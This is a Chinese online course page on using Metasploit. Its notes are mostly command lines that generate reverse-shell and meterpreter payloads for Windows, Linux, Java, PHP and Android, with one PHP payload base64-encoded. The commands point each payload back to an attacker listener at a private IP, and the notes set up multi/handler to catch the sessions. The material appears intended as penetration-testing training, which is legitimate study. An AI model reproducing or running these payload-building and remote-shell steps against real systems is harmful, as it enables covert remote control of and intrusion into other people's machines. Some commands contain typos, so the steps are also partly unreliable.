845人加入学习
(1人评价)
Metasploit应用
价格 免费
该课程属于 武官课程 请加入后再学习

>show payloads

#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=1234 X >/123.exe

123.exe 放到windows主机上

msf>search handler

msf>use exploit/multi/handler

msf>show options

msf>set playload windows/meterpreter/reverse_tcp

msf>show options

msf>set LHOST 192.168.48.130

msf>set LPORT 1234

msf>exploit

#msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.48.130 LPORT=4321 X>linux

#chmod 777 linux

#./linux

#msfpayload java/meterpreter/reverse_tvp LHOST=192.168.48.130 LPORT=1111 W>123.jar

#msfpayload php/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=2222 R | msfencode -e php/base64 -t raw -o 123.php

#msfpayload android/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=3333 R >1.apk

 

 

[展开全文]